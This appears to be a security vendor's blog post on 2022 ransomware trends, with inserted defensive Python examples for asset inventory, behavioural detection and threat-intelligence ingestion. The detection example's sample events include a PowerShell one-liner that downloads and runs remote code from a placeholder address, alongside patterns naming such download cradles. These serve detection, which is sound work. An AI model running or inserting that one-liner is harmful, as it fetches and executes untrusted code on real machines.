
Ransomware attacks 2022: State of the Threat


Ransomware attacks have been on the rise these past two years. As 2022 begins, the question is: will the attacks slow down? What we have experienced in these first three months leaves us without much hope. Several major ransomware attacks have already happened in 2022, and the pace is shaping up to be at least equal to 2021. This is why we are publishing a State of the Threat report: Ransomware attacks 2022.

The factors behind the upsurge in ransomware attacks in 2020 and 2021 are still here. A growing remote workforce, an accelerating digital transformation, and strained supply chains create incredible opportunities for adversaries. Several critical vulnerabilities left many organizations at risk. It is no wonder that ransomware attacks increased 150% between 2020 and 2021.

Initial ransom demands are also growing, averaging above $5 million in the US. The ransomware economy keeps evolving, making ransomware an accessible, although destructive, tool. The ransomware-as-a-service (RaaS) business model sets new trends and breaks records: it lowers the entry barrier so that anyone with access to cryptocurrency can launch a ransomware attack.

Fortunately, defenders’ strategies and tools are also evolving to keep up with the threat. Although we should expect attacks to keep rising or, at the very least, to persist, we can leverage better methods and tools, such as automation and orchestration of our solutions, to strengthen our posture.

Below, we look at the general attacker trends and offer answers that security teams can use to counter them efficiently.

Attackers look for your company’s details and your vulnerabilities before launching attacks

When talking about cyberattacks, one must differentiate between undifferentiated attacks and individualized ones. In individualized attacks, cyberattackers increasingly seek operational and organizational knowledge of the company’s environment before launching their attack. This knowledge includes operational and financial details such as annual budgets, employee counts, revenue statistics, and organization charts.

Once they have gathered this kind of information, attackers can target sectors that are highly profitable or that work under permanent urgency (for instance just-in-time industries such as transport or manufacturing, which cannot afford prolonged disruption).

Awareness programs and recurring training are paramount

Of course, most of this information is publicly available on the internet. Most of the time, it is published to meet legal obligations, such as financial reports, margins, or budgets. We are not advocating secrecy around these figures. However, a company should always be aware that this information is available and constitutes precious operational knowledge for attackers. This is why you need to keep up the effort to engage employees across your company in cybersecurity awareness: gamify your campaigns and training sessions, and dedicate resources and proper teams to them.

On top of operational knowledge of the victim’s environment, attackers are also increasingly looking to understand the victim’s overall attack surface. Knowing your systems and their potential vulnerabilities gives them another way into your network, without spending resources on compromising one of your employees’ credentials.

Take the Microsoft Exchange Server vulnerabilities, for instance. Using CVE-2021-26855, an attacker could access a vulnerable Exchange server with no more knowledge than an email address, with no need for social engineering or business email compromise (BEC). Hence, your organization has to maintain a near real-time understanding of its assets, particularly internet-facing ones, since they can be found by vulnerability scanners that almost anyone can run as a reconnaissance technique.

Usually, an organization’s attack surface includes:

  • Internet-facing systems and services
  • Vulnerabilities or unpatched systems
  • Use of specific solutions or third-party vendors
  • Cloud services

The first step in building an appropriate response to this threat is to gain awareness of your attack surface. Creating and maintaining a Configuration Management Database (CMDB) is one of your priorities, although a challenging one given the growth of remote work and BYOD in many companies, driven by the pandemic and by structural trends. Automating CMDB discovery is an interesting way of keeping your CMDB as close as possible to your actual attack surface.

This way, you can be fully aware of the vulnerabilities potentially affecting your systems as new threats arise, and proactively manage their patching.
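One way to automate the CMDB-versus-reality check described above, as an added example (not Mindflow’s code, and using constructed inventory records): the scan output is reconciled against the CMDB export, and the three kinds of gap (unknown, stale, drifted assets) are reported and fed back into the inventory.

```python
"""Added example (not Mindflow's code): reconcile a CMDB export against the
assets an automated discovery scan actually finds, so the CMDB stays close to
the real attack surface. All inventory records below are constructed."""
from dataclasses import dataclass, field

# Constructed CMDB export: what the organization believes it exposes.
CMDB = [
    {"ip": "203.0.113.10", "service": "Exchange", "version": "15.1.2176", "owner": "IT"},
    {"ip": "203.0.113.20", "service": "VPN", "version": "9.1", "owner": "Network"},
    {"ip": "203.0.113.30", "service": "CRM", "version": "4.2", "owner": "Sales"},
]
# Constructed output of a scheduled external scan of the same address range.
DISCOVERED = [
    {"ip": "203.0.113.10", "service": "Exchange", "version": "15.1.2106"},  # drifted
    {"ip": "203.0.113.20", "service": "VPN", "version": "9.1"},
    {"ip": "203.0.113.40", "service": "RDP", "version": "10.0"},  # unknown to CMDB
]

@dataclass
class Findings:
    unknown: list = field(default_factory=list)  # scanned, absent from CMDB
    stale: list = field(default_factory=list)    # in CMDB, no longer reachable
    drifted: list = field(default_factory=list)  # (ip, cmdb_version, real_version)

def reconcile(cmdb, discovered):
    """Compare both inventories by IP and report the three kinds of gap."""
    known = {a["ip"]: a for a in cmdb}
    seen = {d["ip"]: d for d in discovered}
    f = Findings()
    f.unknown = sorted(ip for ip in seen if ip not in known)
    f.stale = sorted(ip for ip in known if ip not in seen)
    f.drifted = sorted((ip, known[ip]["version"], seen[ip]["version"])
                       for ip in known.keys() & seen.keys()
                       if known[ip]["version"] != seen[ip]["version"])
    return f

def apply_discovery(cmdb, discovered):
    """Refresh the CMDB: correct drifted versions, add unknown assets with an
    UNASSIGNED owner for review, and tag stale records for retirement rather
    than silently dropping them."""
    f = reconcile(cmdb, discovered)
    seen = {d["ip"]: d for d in discovered}
    updated = []
    for asset in cmdb:
        a = dict(asset)
        if a["ip"] in f.stale:
            a["status"] = "retire"
        else:
            a.update(version=seen[a["ip"]]["version"], status="active")
        updated.append(a)
    for ip in f.unknown:
        updated.append({**seen[ip], "owner": "UNASSIGNED", "status": "review"})
    return updated
```

Scheduling `apply_discovery` after every scan is what keeps the CMDB current; the `unknown` list is the shadow IT a vulnerability scanner would find before you do.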

Remote access is a favored way to inject payloads

The exponential growth in remote access abuse is linked to the growth of remote work. With the pandemic, the traditional security perimeter has become obsolete. Your systems are increasingly accessed from various locations, more and more of them outside your enterprise’s physical premises, and from a growing number of devices, phones or laptops, on secured or unsecured local networks. In some cases, it became necessary to provide administrative access to an environment remotely. This is often required for remote branches or remote employees (whose numbers have recently surged).

The concern arises when an organization deploys remote access without observing minimal security configurations. Often, companies deploy remote access in a hurry, with a weak credentials policy or single-factor authentication.

Such remote access systems are vulnerable and easily exploited. Attackers can and do compromise network access, even where security is correctly implemented. Even though some would say the easiest way is to remove remote access altogether, current business conditions make it indispensable.

More advanced mitigation relies on a Zero Trust architecture powered by a SOAR and accompanied by robust workflows for suspicious login and suspicious activity monitoring.


Vulnerabilities are weaponized more and more quickly

When a new vulnerability comes out, a race often starts between attackers and defenders: who will exploit or patch it first? The more critical the vulnerability, the more challenging the race.

Attackers often win this race, at least momentarily, on top of often being aware of the flaw sooner than defenders, especially in the case of zero-day exploits. But one trend is worth noticing: the pace at which attackers weaponize vulnerabilities is quicker than before.

Looking at the significant vulnerabilities of 2021, namely the Microsoft Exchange Server vulnerabilities of March and April and Log4j in December, adversaries moved from vulnerable code to a working exploit within hours of the vulnerabilities being announced. Within hours, working proof-of-concept (PoC) code was available on the internet to install web shells on vulnerable Microsoft Exchange Servers, allowing potential attackers to quickly take advantage of vulnerable systems before relevant patches were even available.

In this case, security teams have two remediation paths.

The first is, of course, to wait for the patches and apply them ASAP. As we said above, attackers are often quicker to exploit vulnerabilities than defenders are to patch them, so defenders also need to rely on network and endpoint alternatives to look for prevention, detection, and response opportunities.

Here, gaining precise and accurate intelligence about the threat is paramount. Automating the ingestion of IOCs and TTPs from Threat Intelligence feeds is necessary to build deep knowledge of potential attacks using these vulnerabilities and of the attackers’ profiles (and therefore their TTPs). This allows security teams to add specific network rules and endpoint signatures, on top of behavioral monitoring, to implement reliable defense mechanisms until patches are out and applied.


Attackers try to leave as small a footprint as possible

Post-exploitation, attackers try to leave as small a footprint as possible on the network and machines, to evade traditional detection mechanisms based on Indicators of Compromise (IoCs) during their intrusion. To that end, they resort to fileless or malware-less attacks.

Fileless malware uses the Windows Registry or a remote location to store malicious code. It leaves little to no malware on disk, thus evading traditional file-based detections and IoCs. Fileless malware may also be memory-only: attackers download and deploy the code directly into memory, again evading file-based detections.

Attackers also use native binaries on the system to evade traditional detections and hide in plain sight during an intrusion. They use the binary for something other than its intended purpose (such as using PowerShell to open a web shell to maintain access). These Living Off the Land Binaries (LOLBins) are legitimate binaries that ship with the operating system; attackers abuse them to camouflage malicious activity such as loading code into memory, downloading a file, or running a custom script.

Speaking of binaries, attackers can also rely on custom scripts or exploit kits on a victim system. They use PowerShell and post-exploitation frameworks such as Cobalt Strike to help achieve their objectives. Although scripts and exploit kits leave on-disk artifacts, they provide easy-to-use ways to compromise multiple systems and stay resident in memory.

To mitigate these TTPs, organizations must rely on endpoint memory monitoring and behavioral analysis tools. Memory monitoring can record which commands were executed on a system, regardless of the program that ran the code.

Analysts can define rules to flag specific action sequences or attempts to access memory. Based on these flags, systems generate alerts for analysts to investigate. For instance, memory monitoring could be set to detect activity related to a Microsoft Word macro executing a PowerShell downloader, a typical intermediate stage in an attack.
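The behavioural rule just described, written out as an added example (not Mindflow’s code): process creation events with Sysmon-style field names are scored on the Office-to-script-host parent/child relation plus command-line traits of downloaders and in-memory staging, which is what catches the macro-launched PowerShell downloader regardless of whether any file touches disk. The events are constructed.

```python
"""Added example (not Mindflow's code): a behavioural rule over process creation
events that flags an Office app spawning a script host with download or in-memory
execution traits, the macro -> PowerShell chain above. Events are constructed."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line traits typical of download cradles and in-memory staging; each
# adds one point, the Office -> script host parent/child relation adds two.
SUSPICIOUS_ARGS = [
    (r"-enc(odedcommand)?\b", "encoded command"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
]

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def score_event(ev):
    """Return (score, reasons) for one process creation event."""
    parent, image = _basename(ev.get("ParentImage", "")), _basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        score, reasons = 2, [f"{parent} spawned {image}"]
    for pattern, label in SUSPICIOUS_ARGS:
        if re.search(pattern, cmd):
            score += 1
            reasons.append(label)
    return score, reasons

def detect(events, threshold=3):
    """Alerts for events at or above the threshold; lowering it surfaces
    medium-confidence cases such as a cradle launched from cmd.exe."""
    scored = ((ev, *score_event(ev)) for ev in events)
    return [{"pid": ev["ProcessId"], "score": s, "reasons": r}
            for ev, s, r in scored if s >= threshold]

# Constructed sample events (the URL and base64 blob are placeholders).
EVENTS = [
    {"ProcessId": 4012, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc PLACEHOLDER_BASE64"},
    {"ProcessId": 4020, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users"},
    {"ProcessId": 4031, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')"},
]
```

The scoring, rather than a single exact-match signature, is what makes the rule survive small variations in how the downloader is invoked; the threshold is the knob analysts tune against their own false-positive rate.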


Attackers leverage automation to hasten lateral movement

Once inside the systems, attackers are becoming increasingly quick to move laterally and gain privileged access. The DFIR describes an intrusion going from zero to domain admin control and ransomware deployment within 42 hours. Another post describes an adversary that went from zero control to complete control in two hours.

Automation creates a predictable, and therefore detectable, sequence of events in predictable OS-native scripting languages like PowerShell. As said above, security teams can use memory monitoring tools to create detection signatures for them.

Furthermore, adversaries increasingly use offensive security tools, especially open-source toolkits and scripts. These are faster to deploy, but they leave footprints that an organization can readily track.

Ransomware attacks 2022: Security Automation and Orchestration

Attackers leverage automation to speed up parts of their attacks and infrastructure. Security teams should leverage it too, to reap its benefits: automated repetitive tasks, faster workflows, fewer errors, and more time for complex tasks.

Countering ransomware attacks requires many tools from different security vendors. Navigating between them means lost time and fragmented frameworks. Here, the answer lies in orchestration. Tools that act as the glue between all of these solutions, such as Security Orchestration, Automation, and Response (SOAR) platforms, are the targeted remedy to consolidate the many panes of glass and to fill the automation gap.

A SOAR helps to:

  • Automate repetitive and low-value tasks such as triage or parsing
  • Design playbooks and define specific triggers (an event or a schedule) to pre-build incident response workflows and harness machine-speed capabilities: for instance, circumvent ransomware attacks with triggers based on abnormal activity detected on an endpoint
  • Orchestrate flows between tools, such as feeding intelligence gathered from TI feeds into detection tools (up-to-date IOCs and TTPs, prioritized by criticality)
  • Free up analysts’ time to focus on higher-value tasks
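The TI-feed orchestration item above, and the automated IOC/TTP ingestion discussed in the vulnerability section, come down to one playbook step. As an added example (not Mindflow’s code; the feed format and scoring formula are assumptions, and the entries are constructed), this ingests indicators from two feeds, drops malformed and allowlisted values, merges duplicates, ranks by criticality with age decay, and emits block rules for the most critical ones:

```python
"""Added example (not Mindflow's code): a playbook step that ingests indicators
from several threat-intelligence feeds, validates and de-duplicates them, ranks
them by criticality and emits block rules for the most critical ones. The feed
entries are constructed and the feed format is an assumption."""
import re
from datetime import date

VALIDATORS = {
    "ipv4": re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"),
    "sha256": re.compile(r"^[0-9a-f]{64}$"),
    "domain": re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,}$"),
}
SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}
ALLOWLIST = {"10.0.0.1"}  # internal addresses must never be blocked by automation

# Constructed entries from two feeds; one indicator is reported by both.
FEED = [
    {"type": "ipv4", "value": "203.0.113.5", "severity": "high", "confidence": 80, "last_seen": "2022-03-01", "source": "feedA"},
    {"type": "ipv4", "value": "203.0.113.5", "severity": "critical", "confidence": 60, "last_seen": "2022-03-10", "source": "feedB"},
    {"type": "domain", "value": "Bad.Example.Test", "severity": "medium", "confidence": 90, "last_seen": "2021-11-01", "source": "feedA"},
    {"type": "sha256", "value": "not-a-hash", "severity": "critical", "confidence": 99, "last_seen": "2022-03-10", "source": "feedB"},
    {"type": "ipv4", "value": "10.0.0.1", "severity": "critical", "confidence": 99, "last_seen": "2022-03-10", "source": "feedB"},
]

def normalize(entries, today_iso):
    """Validate, merge duplicates (highest severity and confidence, latest
    sighting) and score priority = severity * confidence, decayed by age in
    30-day units so stale indicators sink. Returns a dict keyed by (type, value)."""
    today, merged = date.fromisoformat(today_iso), {}
    for e in entries:
        value = e["value"].strip().lower()
        if not VALIDATORS[e["type"]].match(value) or value in ALLOWLIST:
            continue  # malformed or allowlisted: drop, never block on it
        cur = merged.setdefault((e["type"], value), {"severity": "low", "confidence": 0,
                                                     "last_seen": "1970-01-01", "sources": set()})
        if SEVERITY[e["severity"]] > SEVERITY[cur["severity"]]:
            cur["severity"] = e["severity"]
        cur["confidence"] = max(cur["confidence"], e["confidence"])
        cur["last_seen"] = max(cur["last_seen"], e["last_seen"])  # ISO dates sort lexically
        cur["sources"].add(e["source"])
    for cur in merged.values():
        age_days = (today - date.fromisoformat(cur["last_seen"])).days
        cur["priority"] = round(SEVERITY[cur["severity"]] * cur["confidence"] / (1 + age_days / 30), 1)
    return merged

def rules(merged, min_priority=100):
    """Emit block rules, highest priority first, for indicators above the bar."""
    ranked = sorted(merged.items(), key=lambda kv: -kv[1]["priority"])
    return [f"block {t} {v}  # priority={m['priority']} sources={','.join(sorted(m['sources']))}"
            for (t, v), m in ranked if m["priority"] >= min_priority]
```

The validation and allowlist steps are the part worth keeping even if the scoring is replaced: an automated feed-to-firewall path with neither is how a poisoned or malformed feed entry turns into a self-inflicted outage.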

At first, adding yet another tool seems redundant and prone to more complexity. Yet next-generation SOARs like Mindflow are based on a new set of values, far from the traditional SOAR. Mindflow uses a no-code approach to drastically reduce the time and skill needed for your analysts to master and properly operate it. Pre-built actions and playbooks help your analysts create fine-tuned incident response plans that continuously adapt to the evolving threat: for instance, constantly ingest new IOCs and TTPs to update your detection rules, or schedule scans to keep your CMDB up to date.

Paul-Arthur Jonville

CEO of Mindflow. I share our thoughts and vision about cybersecurity and how Mindflow can answer current issues on this blog.
